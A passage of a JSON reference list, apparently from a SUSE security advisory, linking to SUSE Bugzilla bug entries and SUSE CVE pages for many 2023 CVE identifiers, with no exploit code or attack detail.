"url": "https://bugzilla.suse.com/1258299"
},
{
"category": "self",
"summary": "SUSE Bug 1258304",
"url": "https://bugzilla.suse.com/1258304"
},
{
"category": "self",
"summary": "SUSE Bug 1258309",
"url": "https://bugzilla.suse.com/1258309"
},
{
"category": "self",
"summary": "SUSE Bug 1258313",
"url": "https://bugzilla.suse.com/1258313"
},
{
"category": "self",
"summary": "SUSE Bug 1258317",
"url": "https://bugzilla.suse.com/1258317"
},
{
"category": "self",
"summary": "SUSE Bug 1258321",
"url": "https://bugzilla.suse.com/1258321"
},
{
"category": "self",
"summary": "SUSE Bug 1258326",
"url": "https://bugzilla.suse.com/1258326"
},
{
"category": "self",
"summary": "SUSE Bug 1258338",
"url": "https://bugzilla.suse.com/1258338"
},
{
"category": "self",
"summary": "SUSE Bug 1258349",
"url": "https://bugzilla.suse.com/1258349"
},
{
"category": "self",
"summary": "SUSE Bug 1258354",
"url": "https://bugzilla.suse.com/1258354"
},
{
"category": "self",
"summary": "SUSE Bug 1258358",
"url": "https://bugzilla.suse.com/1258358"
},
{
"category": "self",
"summary": "SUSE Bug 1258374",
"url": "https://bugzilla.suse.com/1258374"
},
{
"category": "self",
"summary": "SUSE Bug 1258377",
"url": "https://bugzilla.suse.com/1258377"
},
{
"category": "self",
"summary": "SUSE Bug 1258379",
"url": "https://bugzilla.suse.com/1258379"
},
{
"category": "self",
"summary": "SUSE Bug 1258394",
"url": "https://bugzilla.suse.com/1258394"
},
{
"category": "self",
"summary": "SUSE Bug 1258395",
"url": "https://bugzilla.suse.com/1258395"
},
{
"category": "self",
"summary": "SUSE Bug 1258397",
"url": "https://bugzilla.suse.com/1258397"
},
{
"category": "self",
"summary": "SUSE Bug 1258411",
"url": "https://bugzilla.suse.com/1258411"
},
{
"category": "self",
"summary": "SUSE Bug 1258415",
"url": "https://bugzilla.suse.com/1258415"
},
{
"category": "self",
"summary": "SUSE Bug 1258419",
"url": "https://bugzilla.suse.com/1258419"
},
{
"category": "self",
"summary": "SUSE Bug 1258422",
"url": "https://bugzilla.suse.com/1258422"
},
{
"category": "self",
"summary": "SUSE Bug 1258424",
"url": "https://bugzilla.suse.com/1258424"
},
{
"category": "self",
"summary": "SUSE Bug 1258429",
"url": "https://bugzilla.suse.com/1258429"
},
{
"category": "self",
"summary": "SUSE Bug 1258442",
"url": "https://bugzilla.suse.com/1258442"
},
{
"category": "self",
"summary": "SUSE Bug 1258464",
"url": "https://bugzilla.suse.com/1258464"
},
{
"category": "self",
"summary": "SUSE Bug 1258465",
"url": "https://bugzilla.suse.com/1258465"
},
{
"category": "self",
"summary": "SUSE Bug 1258468",
"url": "https://bugzilla.suse.com/1258468"
},
{
"category": "self",
"summary": "SUSE Bug 1258469",
"url": "https://bugzilla.suse.com/1258469"
},
{
"category": "self",
"summary": "SUSE Bug 1258484",
"url": "https://bugzilla.suse.com/1258484"
},
{
"category": "self",
"summary": "SUSE Bug 1258518",
"url": "https://bugzilla.suse.com/1258518"
},
{
"category": "self",
"summary": "SUSE Bug 1258519",
"url": "https://bugzilla.suse.com/1258519"
},
{
"category": "self",
"summary": "SUSE Bug 1258520",
"url": "https://bugzilla.suse.com/1258520"
},
{
"category": "self",
"summary": "SUSE Bug 1258524",
"url": "https://bugzilla.suse.com/1258524"
},
{
"category": "self",
"summary": "SUSE Bug 1258544",
"url": "https://bugzilla.suse.com/1258544"
},
{
"category": "self",
"summary": "SUSE Bug 1258660",
"url": "https://bugzilla.suse.com/1258660"
},
{
"category": "self",
"summary": "SUSE Bug 1258824",
"url": "https://bugzilla.suse.com/1258824"
},
{
"category": "self",
"summary": "SUSE Bug 1258928",
"url": "https://bugzilla.suse.com/1258928"
},
{
"category": "self",
"summary": "SUSE Bug 1259070",
"url": "https://bugzilla.suse.com/1259070"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-42752 page",
"url": "https://www.suse.com/security/cve/CVE-2023-42752/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53714 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53714/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53743 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53743/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53750 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53750/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53752 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53752/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53759 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53759/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53762 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53762/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53766 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53766/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53768 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53768/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53777 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53777/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53778 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53778/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53782 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53782/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53784 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53784/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53785 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53785/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53787 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53787/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53791 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53791/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53792 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53792/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53793 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53793/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53794 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53794/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53795 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53795/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53797 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53797/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53799 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53799/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53807 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53807/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53808 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53808/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53813 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53815 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53815/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53817 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53817/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53819 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53819/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53821 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53821/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53823 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53823/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53825 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53825/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53828 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53828/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53831 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53831/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53834 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53834/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53836 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53836/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53839 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53839/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53841 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53841/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53842 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53842/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53843 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53843/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53844 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53844/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53846 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53846/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53847 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53847/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53848 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53848/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53850 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53850/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53851 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53851/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53852 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53852/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53855 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53855/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53856 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53856/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53857 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53857/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53858 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53858/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53860 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53860/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53861 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53861/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53863 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53863/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53864 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53864/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53865 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53865/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53989 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53989/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53992 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53992/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53994 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53994/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53995 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53995/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53996 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53996/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53997 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53997/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53998 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53998/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53999 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53999/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54000 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54000/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54001 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54001/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54005 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54006 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54006/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54008 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54008/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54013 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54013/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54014 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54014/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54016 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54016/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54017 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54017/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54019 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54019/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54022 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54022/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54023 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54023/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54025 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54025/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54026 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54026/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54027 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54027/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54030 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54030/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54031 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54031/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54032 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54032/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54035 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54035/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54037 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54037/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54038 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54038/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54042 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54042/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54045 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54045/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54048 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54048/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54049 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54049/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54051 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54051/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54052 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54052/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54060 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54060/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54064 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54064/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54066 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54066/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54067 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54067/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54069 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54069/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54070 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54070/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54072 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54072/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54076 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54076/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54080 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54080/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54081 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54081/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54083 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54083/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54088 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54088/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54089 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54089/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54091 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54091/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54092 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54092/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54093 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54093/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54094 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54094/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54095 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54095/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54096 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54096/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54099 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54099/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54101 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54101/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54104 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54104/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54106 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54106/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54112 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54112/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54113 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54113/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54115 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54115/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54117 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54117/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54121 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54121/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54125 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54125/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54127 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54127/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54133 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54133/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54134 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54134/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54135 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54135/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54136 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54136/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54137 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54137/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54140 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54140/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54141 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54141/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54142 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54142/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54143 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54143/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54145 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54145/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54148 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54148/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54149 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54149/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54153 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54153/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54154 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54154/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54155 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54155/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54156 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54156/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54164 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54164/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54166 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54166/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54169 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54169/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54170 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54170/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54171 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54171/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54172 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54172/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54173 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54173/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54177 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54177/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54178 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54178/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54179 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54179/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54181 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54181/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54183 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54183/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54185 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54185/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54189 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54189/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54194 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54194/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54201 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54201/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54204 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54204/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54207 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54207/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54209 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54209/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54210 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54210/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54211 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54211/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54215 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54215/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54219 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54219/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54220 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54220/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54221 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54221/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54223 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54223/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54224 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54224/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54225 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54225/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54227 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54227/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54229 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54229/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54230 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54230/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54235 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54235/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54240 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54240/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54241 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54241/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54246 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54246/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54247 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54247/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54251 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54251/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54253 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54253/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54254 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54254/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54255 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54255/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54258 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54261 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54263 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54263/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54264 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54264/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54266 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54266/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54267 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54267/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54271 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54271/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54276 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54276/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54278 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54278/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54281 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54281/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54282 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54282/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54283 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54283/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54285 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54289 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54289/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54291 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54291/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54292 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54292/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54293 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54293/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54296 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54296/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54297 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54299 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54299/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54300 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54300/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54302 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54302/"
},
{
"category": "self",
